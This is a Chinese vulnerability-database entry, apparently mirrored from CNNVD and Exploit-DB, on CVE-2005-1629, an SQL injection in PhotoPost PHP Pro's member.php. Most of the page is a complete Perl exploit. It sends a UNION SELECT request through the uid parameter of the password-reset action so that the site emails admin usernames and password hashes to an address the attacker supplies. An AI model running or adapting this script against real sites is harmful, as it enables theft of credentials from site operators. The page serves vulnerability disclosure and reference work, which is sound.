https://www.exploit-db.com/exploits/989
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1078
All Enthusiast PhotoPost PHP Pro Member.PHP SQL注入漏洞






漏洞ID | 1108782 | 漏洞类型 | SQL注入 |
发布时间 | 2005-05-13 | 更新时间 | 2006-09-27 |
![]() |
CVE-2005-1629 | ![]() |
CNNVD-200505-1078 |
漏洞平台 | PHP | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
PhotopostPHPPro的member.php中存在SQL注入漏洞,远程攻击者可以通过verifykey参数执行任意SQL命令。
|漏洞EXP
#!/usr/bin/perl
# PhotoPost Arbitrary Data Exploit
# --------------------------------
# INFPG - Hacking&Security Research
#
#
# Use first the exploit code,then You'll get admin MD5 hash and user name on your mail.
#
# Greats: Infam0us Gr0up team/crew/fans,Zone-H,securiteam,str0ke-milw0rm,addict3d,
# Thomas-secunia,Yudha,Dcrab's,Kavling Community,1st Indonesian Security,
# Jasakom,ECHO,etc..betst reagrds t0 whell.
# Info: www.98.to/infamous
#
use IO::Socket;
if (@ARGV < 3)
{
system "clear";
print "PhotoPost Arbitrary Data Exploit\n";
print "\n-------------------------------\n";
print "\nINFGP-Hacking&Security Research\n";
print "\n\n";
print "[?]Usage: perl $0 [host] [path] [mail] \n";
exit(1);
}
system "clear";
$server = $ARGV[0];
$folder = @ARGV[1];
$mail = @ARGV[2];
print "Connecting to host ...\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$ARGV[0]",
PeerPort => "80"); unless ($socket)
{
die "Server is offline\n"
}
print "[+]Connected\n\n";
print "[+]Building string core..\n";
$stringcore = 'member.php?ppaction=rpwd&verifykey=0&uid=0%20union%20select%20"0",$mail
,%20concat(username,"%20",%20password)%20from%20users';
print "Sent 0day..\n\n";
print $socket "GET /$folder/$stringcore HTTP/1.0\r\n\r\n";
print "Server Exploited\n";
print "You should check $mail now";
close($socket);
# milw0rm.com [2005-05-13]
|参考资料
来源:FULLDISC
名称:20050513PhotoPostArbitraryDataExploit
链接:http://seclists.org/lists/fulldisclosure/2005/May/0311.html
来源:BID
名称:13620
链接:http://www.securityfocus.com/bid/13620
检索漏洞
开始时间
结束时间